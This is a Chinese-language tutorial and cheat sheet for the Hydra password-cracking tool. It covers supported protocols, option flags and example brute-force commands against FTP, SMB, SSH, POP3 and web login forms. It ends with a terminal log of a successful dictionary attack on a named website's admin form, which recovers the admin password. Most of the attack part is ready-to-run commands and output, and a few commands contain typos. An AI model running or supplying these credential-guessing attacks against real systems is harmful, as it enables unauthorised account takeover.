Hydra 在线密码破解工具 支持多种协议(身份认证)每种协议有不同的身份认证数据提交格式 根据提交数据的返回信息判断认证是成功与否 adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp hydra -l [user] -p [pass] [service://server[:PORT][/OPT]]
hydra -l user -p password ftp://1.1.1.1:2121
hydra -L user.txt -P pass.txt smb://1.1.1.0/24
hydra -l user -P pass.txt -M targets.txt ssh
hydra -C cred.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
-C : login:pass
hydra -U pop3s
#查询模块可用选项-R 继续之前未完成的破解任务( hydra.restore ) -I 重新开始扫描(忽略hydra.restqre ) -S 执行SSL连接( -0使用过时的SSLv2 /v3 ) -X MIN:MAX:CHARSET ( 小写a/大写A/数字1 ) -e nsr n空密码/ S用户名作密码/ r翻转的用户名做密码 -U 循环用户( 默认循环密码) -o 结果输出到文件 -f/-F 成功退出(-f per host, -F global) -t / -T 每主机并发连接数/全局并发连接数 -c 登录请求延时 -4/-6 IPv4 /v6 -v/-V 详细信息/每次登陆 基于表单的web应用程序密码破解 hydra -1 admin -P pass.txt 192.168. 20.10 http-post-form "dwwa/login.php:username= ^USER^&password= ^PASS ^&Login=Login:S=index.php -t 1 -vV F=login.php #S成功 F失败 C= /page/cookie:H=‘UA:firefox’ #指定cookie获取页面和http头 https-post form. http- get-form. https- get-form hydra -U http-post form 查看模块参数 例子:表单爆破
hydra -l admin -P ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login" -vV
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 /usr/share/wordlists 14m 26s root@kali 0.03 15:40:29 ❯ hydra -l admin -P ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login" -vV Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-10 15:40:37 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task [DATA] attacking http-post-form://www.c1moon.com:80/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [ATTEMPT] target www.c1moon.com - login "admin" - pass "123456" - 1 of 10000 [child 0] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "password" - 2 of 10000 [child 1] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "12345678" - 3 of 10000 [child 2] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "qwerty" - 4 of 10000 [child 3] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "123456789" - 5 of 10000 [child 4] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "12345" - 6 of 10000 [child 5] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "1234" - 7 of 10000 [child 6] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "111111" - 8 of 10000 [child 7] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "1234567" - 9 of 10000 [child 8] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "dragon" - 10 of 10000 [child 9] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "123123" - 11 of 10000 [child 10] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "baseball" - 12 of 10000 [child 11] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "abc123" - 13 of 10000 [child 12] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "football" - 14 of 10000 [child 13] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "monkey" - 15 of 10000 [child 14] (0/0) [ATTEMPT] target www.c1moon.com - login "admin" - pass "letmein" - 16 of 10000 [child 15] (0/0) [80][http-post-form] host: www.c1moon.com login: admin password: 123456 [STATUS] attack finished for www.c1moon.com (valid pair found) 1 of 1 target successfully completed, 1 valid password found